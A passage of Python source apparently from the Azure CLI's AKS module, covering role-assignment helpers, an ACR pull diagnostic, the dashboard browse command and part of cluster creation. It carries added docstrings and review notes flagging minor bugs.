if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, SPN, or object id) to a graph object id.

    :raises CLIError: when nothing in the graph matches.
    """
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if '@' in assignee:  # looks like a user principal name
        result = list(client.users.list(
            filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])

    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError(
            "No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Look up directory object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True,
                                 object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a Network Contributor assignment already exists at *scope*."""
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    factory = get_auth_management_client(cli_ctx, scope)
    assignments = factory.role_assignments.list_for_scope(scope=scope, filter='atScope()')
    # any() short-circuits on the first match, like the original early return.
    return any(a.scope == scope and a.role_definition_id.endswith(network_contributor_role_id)
               for a in assignments)
def aks_check_acr(cmd, client, resource_group_name, name, acr):
    """Verify that the cluster's nodes can pull from the registry *acr* by
    running the 'canipull' diagnostic pod on the cluster.

    :raises ValidationError: when kubectl is missing or its version cannot be determined.
    :raises CLIError: when the diagnostic pod fails to run or produces no output.
    """
    if not which("kubectl"):
        raise ValidationError("Can not find kubectl executable in PATH")

    # Fetch user (non-admin) credentials into a temporary kubeconfig for kubectl.
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(
        cmd, client, resource_group_name, name, admin=False, path=browse_path
    )

    # Get kubectl minor version.  The original reused the name `cmd` here,
    # shadowing the command-context parameter; renamed to keep both usable.
    kubectl_minor_version = -1
    try:
        version_cmd = f"kubectl version -o json --kubeconfig {browse_path}"
        version_proc = subprocess.Popen(version_cmd, shell=True, stdout=subprocess.PIPE)
        version_json, _ = version_proc.communicate()
        kubectl_version = json.loads(version_json)
        kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"])
        kubectl_server_minor_version = int(
            kubectl_version["serverVersion"]["minor"])
        kubectl_server_patch = int(
            kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
        if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
            # Fixed missing space between the joined literals ("formore" -> "for more").
            logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
                           'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for '
                           'more information.')
    except subprocess.CalledProcessError as err:
        raise ValidationError(
            "Could not find kubectl minor version: {}".format(err))
    if kubectl_minor_version == -1:
        raise ValidationError("Failed to get kubectl version")

    # Unique pod name so repeated checks cannot collide.
    podName = "canipull-" + str(uuid.uuid4())
    overrides = {
        "spec": {
            "restartPolicy": "Never",
            "hostNetwork": True,
            "containers": [
                {
                    "securityContext": {"runAsUser": 0},
                    "name": podName,
                    "image": CONST_CANIPULL_IMAGE,
                    "args": ["-v6", acr],
                    "stdin": True,
                    "stdinOnce": True,
                    "tty": True,
                    "volumeMounts": [
                        {"name": "azurejson", "mountPath": "/etc/kubernetes"},
                        {"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
                    ],
                }
            ],
            "tolerations": [
                {"key": "CriticalAddonsOnly", "operator": "Exists"},
                {"effect": "NoExecute", "operator": "Exists"},
            ],
            "volumes": [
                {"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
                {"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
            ],
            "nodeSelector": {"kubernetes.io/os": "linux"},
        }
    }

    try:
        check_cmd = [
            "kubectl",
            "run",
            "--kubeconfig",
            browse_path,
            "--rm",
            "--quiet",
            "--image",
            CONST_CANIPULL_IMAGE,
            "--overrides",
            json.dumps(overrides),
            "-it",
            podName,
        ]
        # Support kubectl versions < 1.18
        if kubectl_minor_version < 18:
            check_cmd += ["--generator=run-pod/v1"]
        output = subprocess.check_output(
            check_cmd,
            universal_newlines=True,
        )
    except subprocess.CalledProcessError as err:
        raise CLIError("Failed to check the ACR: {}".format(err))
    if output:
        print(output)
    else:
        raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
               listen_address='127.0.0.1', listen_port='8001'):
    """Open the Kubernetes dashboard (or the Azure portal resources view) for a cluster.

    For clusters on k8s >= 1.19 or without the kube-dashboard addon, the Azure
    portal workloads view is opened.  Otherwise a kubectl proxy tunnel to the
    in-cluster dashboard is started locally (with cloud-shell support).

    :param disable_browser: only print/log the URL instead of opening it.
    :param listen_address: local address for the kubectl proxy.
    :param listen_port: local port for the kubectl proxy.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            # Azure Portal URL (https://portal.azure.com for public cloud)
            cmd.cli_ctx.cloud.endpoints.portal +
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning(
                'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    # Fetch user (non-admin) credentials into a temporary kubeconfig.
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        # In cloud shell, a helper service on localhost:8888 exposes the port.
        response = requests.post(
            'http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning(
            'To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
        logger.warning('Press CTRL+C to close the tunnel...')
        if not disable_browser:
            wait_then_open_async(dashboardURL)
    try:
        try:
            # Blocks until the user interrupts; serves the dashboard locally.
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # NOTE(review): str/bytes .find() returns -1 (truthy) when the text is
            # absent, so this retry branch runs for almost ANY proxy failure, not
            # only for "unknown flag" — presumably intended as `!= -1`; confirm.
            if err.output.find(b'unknown flag: --address'):
                if listen_address != '127.0.0.1':
                    logger.warning(
                        '"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning(
                        'The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig",
                                 browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
    """Ensure *ssh_key_value* is a valid RSA public key unless --no-ssh-key was given.

    :raises CLIError: when the key is missing or malformed.
    """
    if no_ssh_key:
        return
    try:
        if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
            raise ValueError()
    except (TypeError, ValueError):
        shortened_key = truncate_text(ssh_key_value)
        raise CLIError(
            'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to the identity
    backing the monitoring (omsagent) addon.

    Prefers the cluster's service principal when one exists; otherwise falls
    back to the addon's user-assigned MSI.  Failures are logged as warnings.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
            (hasattr(
                result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # Fixed implicit string concatenation that produced "roleassignment".
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the identity backing the ingress-appgw addon the role assignments
    it needs on the application gateway / subnet / virtual network it manages.

    Prefers the cluster's service principal when one exists; otherwise falls
    back to the addon's user-assigned MSI.  Failed assignments are logged as
    warnings, not raised.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
            (hasattr(
                result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[
            CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        # Existing gateway supplied: Contributor on the gateway's resource group.
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        # Existing subnet supplied: Network Contributor on that subnet.
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        # Subnet to be created from a CIDR: Contributor on the node pool's vnet.
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(
                    result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal, scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
    """Grant 'Contributor' on the node subnet's virtual network to the identity
    backing the virtual-node (ACI connector) addon.

    Prefers the cluster's service principal when one exists; otherwise falls
    back to the addon's user-assigned MSI.  Failures are logged as warnings.
    """
    # Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
    vnet_id = vnet_subnet_id.rpartition('/')[0]
    vnet_id = vnet_id.rpartition('/')[0]

    service_principal_msi_id = None
    is_service_principal = False
    os_type = 'Linux'
    addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (addon_name in result.addon_profiles) and
            (hasattr(result.addon_profiles[addon_name], 'identity')) and
            (hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
    ):
        logger.info('virtual node MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                    service_principal_msi_id, is_service_principal, scope=vnet_id):
            logger.warning('Could not create a role assignment for virtual node addon. '
                           'Are you an Owner on this subscription?')
    else:
        # Fixed implicit string concatenation that produced "roleassignment".
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value,  # pylint: disable=too-many-locals
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               uptime_sla=False,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               vnet_subnet_id=None,
               ppg=None,
               max_pods=0,
               min_count=None,
               max_count=None,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               zones=None,
               enable_node_public_ip=False,
               node_public_ip_prefix_id=None,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               api_server_authorized_ip_ranges=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               fqdn_subdomain=None,
               enable_managed_identity=True,
               assign_identity=None,
               attach_acr=None,
               enable_aad=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               appgw_name=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_sgxquotehelper=False,
               enable_encryption_at_host=False,
               assign_kubelet_identity=None,
               enable_ultra_ssd=False,
               edge_zone=None,
               no_wait=False,
               yes=False,
               enable_azure_rbac=False):
    """Create a new AKS managed cluster.

    Orchestrates the full creation flow: resolves the versioned SDK model
    classes, validates/derives arguments, builds the agent-pool, Linux,
    Windows, service-principal, network, addon, AAD and identity profiles,
    performs any role assignments needed up front, then submits the
    ManagedCluster to the service, retrying on AAD propagation errors.

    Returns the created cluster object, or None when the user declines the
    system-assigned-identity confirmation prompt.

    Raises CLIError / MutuallyExclusiveArgumentError / ArgumentUsageError /
    InvalidArgumentValueError on invalid argument combinations.
    """
    # --- Resolve SDK model classes for the client's target API version. ---
    ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
                                                  resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                  operation_group='managed_clusters')
    ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
                                       resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                       operation_group='managed_clusters')
    ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
                                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                    operation_group='managed_clusters')
    ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
                                                  resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                  operation_group='managed_clusters')
    ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='managed_clusters')
    ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
                                                      resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                      operation_group='managed_clusters')
    ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
                                                  resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                  operation_group='managed_clusters')
    ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='managed_clusters')
    ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
                                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                    operation_group='managed_clusters')
    ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='managed_clusters')
    # These auto-generated names come straight from the swagger schema; they
    # model the kubelet identity entry and the user-assigned-identity entry.
    ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties = cmd.get_models(
        'ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties',
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
        operation_group='managed_clusters')
    ManagedCluster = cmd.get_models('ManagedCluster',
                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                    operation_group='managed_clusters')
    Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
        'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
        operation_group='managed_clusters')
    # --- Argument validation and derived defaults. ---
    _validate_ssh_key(no_ssh_key, ssh_key_value)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if dns_name_prefix and fqdn_subdomain:
        raise MutuallyExclusiveArgumentError(
            '--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
    if not dns_name_prefix and not fqdn_subdomain:
        dns_name_prefix = _get_default_dns_prefix(
            name, resource_group_name, subscription_id)

    # Default the cluster location to the resource group's location.
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location

    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(
        load_balancer_sku, kubernetes_version)

    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError(
            '--api-server-authorized-ip-ranges can only be used with standard load balancer')

    # --- System agent pool profile. ---
    agent_pool_profile = ManagedClusterAgentPoolProfile(
        # Must be 12 chars or less before ACS RP adds to it
        name=_trim_nodepoolname(nodepool_name),
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        availability_zones=zones,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type,
        mode="System"
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool_profile.os_disk_type = node_osdisk_type

    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)

    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(
            admin_username=admin_username, ssh=ssh_config)

    # --- Windows profile: prompt interactively for missing credentials. ---
    windows_profile = None
    if windows_admin_username or windows_admin_password:
        # To avoid that windows_admin_password is set but windows_admin_username is not
        if windows_admin_username is None:
            try:
                from knack.prompting import prompt
                windows_admin_username = prompt('windows_admin_username: ')
                # The validation for admin_username in ManagedClusterWindowsProfile will fail even if
                # users still set windows_admin_username to empty here
            except NoTTYException:
                raise CLIError(
                    'Please specify username for Windows in non-interactive mode.')

        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(
                    msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError(
                    'Please specify both username and password in non-interactive mode.')

        # Azure Hybrid User Benefits license only when --enable-ahub was given.
        windows_license_type = None
        if enable_ahub:
            windows_license_type = 'Windows_Server'

        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)

    # If customer explicitly provide a service principal, disable managed identity.
    if service_principal and client_secret:
        enable_managed_identity = False
    # Skip create service principal profile for the cluster if the cluster
    # enables managed identity and customer doesn't explicitly provide a service principal.
    service_principal_profile = None
    principal_obj = None
    if not(enable_managed_identity and not service_principal and not client_secret):
        principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                      service_principal=service_principal, client_secret=client_secret,
                                                      subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
                                                      fqdn_subdomain=fqdn_subdomain, location=location, name=name)
        service_principal_profile = ManagedClusterServicePrincipalProfile(
            client_id=principal_obj.get("service_principal"),
            secret=principal_obj.get("client_secret"),
            key_vault_secret_ref=None)

    # --- Grant 'Network Contributor' on a bring-your-own subnet if needed. ---
    need_post_creation_vnet_permission_granting = False
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # if service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. Two cases:
        # 1. For system assigned identity, we just tell user to grant the
        # permission after the cluster is created to keep consistent with portal experience.
        # 2. For user assigned identity, we can grant needed permission to
        # user provided user assigned identity before creating managed cluster.
        if service_principal_profile is None and not assign_identity:
            # NOTE(review): the two fragments below concatenate to "your ownsubnet"
            # (missing space at the join) — candidate wording fix.
            msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own'
                   'subnet, which will have no latency for the role assignment to '
                   'take effect. When using SYSTEM assigned identity, '
                   'azure-cli will grant Network Contributor role to the '
                   'system assigned identity after the cluster is created, and '
                   'the role assignment will take some time to take effect, see '
                   'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
                   'proceed to create cluster with system assigned identity?')
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            need_post_creation_vnet_permission_granting = True
        else:
            scope = vnet_subnet_id
            identity_client_id = ""
            if assign_identity:
                identity_client_id = _get_user_assigned_identity_client_id(
                    cmd.cli_ctx, assign_identity)
            else:
                identity_client_id = service_principal_profile.client_id
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        identity_client_id, scope=scope):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')

    load_balancer_profile = create_load_balancer_profile(
        cmd,
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)

    # --- ACR attachment: with managed identity this must wait for creation. ---
    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
            # Attach acr operation will be handled after the cluster is created
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)

    outbound_type = _set_outbound_type(
        outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)

    # --- Network profile: explicit plugin settings, else kubenet defaults. ---
    network_profile = None
    if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
            docker_bridge_address, network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError(
                'Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )

    # --- Addon profiles (monitoring, appgw ingress, virtual node, ...). ---
    addon_profiles = _handle_addons_args(
        cmd,
        enable_addons,
        subscription_id,
        resource_group_name,
        {},
        workspace_resource_id,
        aci_subnet_name,
        vnet_subnet_id,
        appgw_name,
        appgw_subnet_cidr,
        appgw_id,
        appgw_subnet_id,
        appgw_watch_namespace,
        enable_sgxquotehelper
    )
    monitoring = False
